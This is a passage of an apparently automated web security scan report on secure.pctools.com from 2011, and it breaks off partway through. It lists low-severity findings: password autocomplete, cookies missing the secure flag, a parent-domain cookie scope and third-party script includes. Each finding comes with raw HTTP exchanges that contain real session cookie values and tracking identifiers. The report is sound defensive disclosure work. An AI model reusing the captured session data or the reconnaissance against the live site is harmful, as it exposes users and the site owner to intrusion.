pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 20515
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/nl/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.11. https://secure.pctools.com/ru/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /ru/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ru/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 21389
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - ...... .............. ..........</title>
   <meta http-equiv=
...[SNIP]...
</p>
<form id="login" method="post" action="/ru/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.12. https://secure.pctools.com/zh/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /zh/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /zh/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 19778
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/zh/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://secure.pctools.com/myaccount/logout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/logout/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myaccount/logout/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /myaccount/
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Connection: close
Set-Cookie: myaccount=deleted; expires=Sun, 21 Mar 2010 01:13:55 GMT; path=/
Content-Length: 19250

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...

3.2. https://secure.pctools.com/res/js/uniqueid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/js/uniqueid.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/js/uniqueid.php HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 21 Mar 2011 01:11:16 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:16 GMT
Connection: keep-alive
Set-Cookie: ccheck=deleted; expires=Sun, 21 Mar 2010 01:11:15 GMT; path=/; domain=.pctools.com
Content-Length: 111

var uniqueID = "071299204246230163";
var s_campaign = "";
var s_prop1 = "";
var cb = 177246278;
var cd = 85714;

4. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /res/js/uniqueid.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /res/js/uniqueid.php HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 21 Mar 2011 01:11:16 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:16 GMT
Connection: keep-alive
Set-Cookie: ccheck=deleted; expires=Sun, 21 Mar 2010 01:11:15 GMT; path=/; domain=.pctools.com
Content-Length: 111

var uniqueID = "071299204246230163";
var s_campaign = "";
var s_prop1 = "";
var cb = 177246278;
var cd = 85714;

5. Cross-domain script include  previous  next
There are 36 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. https://secure.pctools.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /company/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.2. https://secure.pctools.com/company/awards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /company/awards/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/awards/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.3. https://secure.pctools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671785|PC#1300668855394-755649.17#1301879525|check#true#1300669985; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:23 GMT
Connection: keep-alive
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.4. https://secure.pctools.com/file-recover/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /file-recover/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /file-recover/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:24 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.5. https://secure.pctools.com/firewall/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /firewall/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /firewall/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:23 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.6. https://secure.pctools.com/free-antivirus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /free-antivirus/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /free-antivirus/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
